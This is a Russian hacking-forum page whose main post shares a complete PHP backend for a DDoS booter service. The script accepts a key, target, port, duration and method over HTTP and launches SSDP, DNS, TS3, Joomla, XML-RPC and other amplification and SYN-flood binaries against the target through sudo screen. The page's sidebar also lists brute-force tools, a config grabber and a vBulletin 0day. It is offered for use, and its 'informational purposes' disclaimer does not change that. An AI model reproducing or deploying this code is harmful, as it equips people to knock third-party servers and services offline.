Главная Форум Файлы Статьи СОСТАВ ZH&ZHS О НАС GITHUB КАНАЛ YouTube BlackList WhiteList
Добро пожаловать на уникальный игровой портал ZETA-HACK TEAM! Здесь Вы сможете найти самые интересные новости из мира игровой индустрии, найти самые свежие сотфины для различных онлайн игр, общаясь на форуме получать мнения специалистов и помогать тем кто не смог получить нужный ответ в той или иной сфере!
Авторизация Регистрация
Последние обсуждаемые темы на форуме
Последние комментарии к новостям
Топ-10 форумчан
QUERY flooder AdCKuY_DpO4uLa 0
Заявочка G1TLER 3
Делаем лаунчер SA-MP или инжек... [FBI]@PUNISHER@ 0
[PYTHON] Ftp Brute Force =AlexDrift= 0
[PHP] Skype BruteForce =AlexDrift= 0
[PHP] Facebook Email Checker =AlexDrift= 0
[PYTHON] Gmail Bruteforce XMPP =AlexDrift= 0
vBulletin 5.1.x - PreAuth 0day... =AlexDrift= 0
[PHP] Mysql File Bypass =AlexDrift= 0
[PHP] Configs Grabber =AlexDrift= 0
Microsoft назвала дату смерти Windows 7 10.09.2019
x-gaming dm 0.3e 23.05.2019
x-gaming dm 0.3e 12.05.2019
x-gaming dm 0.3e 12.05.2019
Microsoft назвала дату смерти Windows 7 25.04.2019
[0.3е]Русский ДМ сервер 18.04.2019
[0.3.7]Forward-Evolution DM by [KrYpToDe... 18.04.2019
[DM] UNIVERSAL SERVER 18.04.2019
[GTA SAMP] Закрытие игры при вылете 27.02.2019
Microsoft назвала дату смерти Windows 7 26.02.2019
1. =AlexDrift= 582
2. Pahanch1kkk 46
3. AdCKuY_DpO4uLa 36
4. InFerNo 35
5. R4DUGA 32
6. d1amondl1on 31
7. [NACIONAL]IST_BERZ 23
8. Julia 21
9. Lil_Jonson 17
10. Effect 15
Витрина ссылок Купить ссылку (4 р.) » | Ваша ссылка | Ваша ссылка | Ваша ссылка | Ваша ссылка | Ваша ссылка | Ваша ссылка | Ваша ссылка

  • Страница 1 из 1
  • 1
Форум » Hacking и все что с ним связано » DoS/DDoS/Exploits » PHP Send Attack Script.php
PHP Send Attack Script.php
24.07.2019 в 18:30
#1
=AlexDrift=
Не важны козыри если игра не на счет...
Статус: Offline
Регистрация: 24.11.2012
Сообщения: 582
Репутация: 84
Что бы добавить медаль "Легенда портала" добавляем в ?if "or 1='ID пользователя'"
Что бы добавить медаль "Золотой страж" добавляем в ?if "or 1='ID пользователя'"
Код
/**
 * PHP Send Attack Script
 * Free for anyone to use :D
 * By far the most secure script out there kek
 *
 * @author   AppleJuice (http://www.hackforums.net/member.php?action=profile&uid=961257)
 */

header("Content-Type: application/json");

// enable debugging?
define("DEBUG", false);

if (DEBUG) {
   ini_set("display_errors", "On");
   error_reporting(-1);
} else {
   ini_set("display_errors", "Off");
   error_reporting(0);
}

// valid keys
$validKeys = array(
   "YourKeyHere",
);

// allowed attack methods
$validMethods = array(
   // attack methods
   "SSDP", "DNS",  "NTP",    "CHARGEN",  "TS3", 
   "TCP",  "SSYN", "ESSYN",  "UDP",      "OVH",
   "VSE",  "ARME", "RUDY",   "GET", 
   "HEAD", "POST", "JOOMLA", "DOMINATE", "XML-RPC",
   // options
   "stop", "help", "list"
);

// default response
$response = array(
   "success" => false,
   "error"   => true,
);

// because OCD
function prettyPrint( $json )
{
    $result = '';
    $level = 0;
    $in_quotes = false;
    $in_escape = false;
    $ends_line_level = NULL;
    $json_length = strlen( $json );

    for( $i = 0; $i < $json_length; $i++ ) {
        $char = $json[$i];
        $new_line_level = NULL;
        $post = "";
        if( $ends_line_level !== NULL ) {
            $new_line_level = $ends_line_level;
            $ends_line_level = NULL;
        }
        if ( $in_escape ) {
            $in_escape = false;
        } else if( $char === '"' ) {
            $in_quotes = !$in_quotes;
        } else if( ! $in_quotes ) {
            switch( $char ) {
                case '}': case ']':
                    $level--;
                    $ends_line_level = NULL;
                    $new_line_level = $level;
                    break;

                case '{': case '[':
                    $level++;
                case ',':
                    $ends_line_level = $level;
                    break;

                case ':':
                    $post = " ";
                    break;

                case " ": case "\t": case "\n": case "\r":
                    $char = "";
                    $ends_line_level = $new_line_level;
                    $new_line_level = NULL;
                    break;
            }
        } else if ( $char === '\\' ) {
            $in_escape = true;
        }
        if( $new_line_level !== NULL ) {
            $result .= "\n".str_repeat( "\t", $new_line_level );
        }
        $result .= $char.$post;
    }

    return $result;
}

// check for key, target, port, time and method
if (isset($_GET['key'], $_GET['target'], $_GET['port'], $_GET['time'], $_GET['method'])) {
   // validate the request info
   if (
      // make sure shit was specified
      !empty($_GET['key'])  && !empty($_GET['target']) && !empty($_GET['port']) &&
      !empty($_GET['time']) && !empty($_GET['method']) &&
      
      // validate types
      is_string($_GET['key'])    && is_string($_GET['target']) &&
      is_string($_GET['time'])   && is_string($_GET['method']) &&
      ctype_digit($_GET['port']) && ctype_digit($_GET['time']) && 
      
      // validate target
      (
         filter_var($_GET['target'], FILTER_VALIDATE_IP) ||
         filter_var($_GET['target'], FILTER_VALIDATE_URL)
      ) &&
      
      // validate time & ports
      (
         $_GET['time'] > 0 && $_GET['time'] < 14400 &&
         $_GET['port'] > 0 && $_GET['port'] < 65535 // max 16-bit # for ports
      )
   ) {
      // check for valid key
      if (in_array($_GET['key'], $validKeys)) {
         // check for valid method
         if (in_array($_GET['method'], $validMethods)) {
            // escape that shit
            $key    = escapeshellarg(escapeshellcmd($_GET['key']));
            $target = escapeshellarg(escapeshellcmd($_GET['target']));
            $port   = escapeshellarg(escapeshellcmd((int)$_GET['port']));
            $time   = escapeshellarg(escapeshellcmd((int)$_GET['time']));
            $proc   = hash('crc32', $target);
            
            // attempt to parse URL
            if (filter_var($_GET['target'], FILTER_VALIDATE_URL)) {
               if (($url = parse_url($_GET['target'])) !== null) {
                  $response['error']   = false;
                  $target = $url['scheme'] . "://" . $url['host'];
               } else {
                  $response['message'] = "Invalid URL";
               }
            } else if (filter_var($_GET['target'], FILTER_VALIDATE_IP)) {
               $response['error']   = false;
            }
            
            if (DEBUG) {
               // pass request info into response, should be removed later
               $response['request'] = array(
                  "target" => $target,
                  "port"   => $port,
                  "time"   => $time,
                  "method" => $_GET['method'],
                  "proc"   => $proc,
               );
            }
            
            if ($response['error'] === false) {
               // attack methods switch
               switch ($_GET['method']) {
                  case "SSDP":
                     $response['response'] = shell_exec("sudo screen -d -m -S $proc ./ssdp $target $port ssdpamp 4 $time");
                     $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
                     $response['success'] = true;
                  break;
                  case "UDP":
                     $response['response'] = shell_exec("sudo screen -d -m -S $proc ./50x $target $port dnsamp 4 $time");
                     $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
                     $response['success'] = true;
                  break;            
                  case "SSYN":
                     $response['response'] = shell_exec("sudo screen -d -m -S $proc ./ssyn $target $port 4 $time");
                     $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
                     $response['success'] = true;
                  break;
                  case "ESSYN":
                     $response['response'] = shell_exec("sudo screen -d -m -S $proc ./essyn $target $port 4 -1 $time");
                     $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
                     $response['success'] = true;
                  break;
                  case "TCP":
                     $response['response'] = shell_exec("sudo screen -d -m -S $proc ./tcp $target $port 4 -1 $time");
                     $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
                     $response['success'] = true;
                  break;
                  case "DOMINATE":
                     $response['response'] = shell_exec("sudo screen -d -m -S $proc ./dominate $target $port 4 -1 $time");
                     $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
                     $response['success'] = true;
                  break;
                  case "TS3":
                     $response['response'] = shell_exec("sudo screen -d -m -S $proc ./ts3 $target $port ts3amp 4 $time");
                     $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
                     $response['success'] = true;
                  break;
                  case "JOOMLA":
                     $response['response'] = shell_exec("sudo screen -d -m -S $proc ./joomla $target joomamp $time 1000");
                     $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
                     $response['success'] = true;
                  break;
                  case "XML-RPC":
                     $response['response'] = shell_exec("sudo screen -d -m -S $proc ./xml $target xmlamp $time 1000");
                     $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
                     $response['success'] = true;
                  break;
                  case "OVH":
                     $response['response'] = shell_exec("sudo screen -d -m -S $proc ./ovh $target $port pvhamp 4 $time");
                     $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
                     $response['success'] = true;
                  break;
                  case "stop":
                     $response['response'] = shell_exec("sudo pkill -f " . $proc);
                     $response['message'] = "Attack stopped to " . $target . ":" . $_GET['port'];
                     $response['success'] = true;
                  break;
                  
                  // method to return valid attack methods
                  case "list":
                  case "help";
                     $response['message'] = "Acceptable attack methods: " . implode(",", $validMethods);
                  break;
                  
                  // if method is valid but wasn't handled, return an error
                  default:
                     $response['message'] = "Internal server error. A valid method was requested but could not be handled.";
                  break;
               }
            }
         } else {
            $response['message'] = "Invalid attack method";
         }
      } else {
         $response['message'] = "Invalid key";
      }
   } else {
      $response['message'] = "Illegal request";
   }
} else {
   $response['message'] = "Invalid API request";
}

// remove response if we ain't debugging
if (!DEBUG) {
   unset($response['response']);
}

// encode response array to json
echo prettyPrint(json_encode($response, true));

В ЛС не отвечу даже не старайтесь. Все вопросы на форум, создавайте тему там ответим.

Форум » Hacking и все что с ним связано » DoS/DDoS/Exploits » PHP Send Attack Script.php
  • Страница 1 из 1
  • 1
Поиск:

условия предоставления
Авторские права и контакты
счетчики
счетчики
счетчики
Файлы, статьи, публикации на форуме предоставлены исключительно в ознакомительных целях. Все материалы принадлежат исключительно их владельцам! Администрация портала не несет ответственности за последствия использования вами сторонних материалов, опубликованных на форуме, каталоге файлов, каталоге статей, но гарантирует отсутствие вредоносного кода в новостях и публикациях на главной. Напоминаем:Весь материал публикуется только для ознакомительных целей! Администрация не несёт ответственности за размещённые материалы. Все материалы предоставлены в ознакомительных целях и администрация предлагает удалить их после ознакомления.
  • Основатель портала - AlexDrift
  • Автор дизайна, разработчик - Lil Jonson
  • По возникшим вопросам дизайна - liljonson682@gmail.com
  • По всем возникшим вопросам - vk.com/alexdrift1137
  • Уникальный игровой портал ZETA-HACK.RU ® 2011 - 2019
  • Сайт создан в системе uCoz

  • Яндекс.Метрика
    Рейтинг@Mail.ru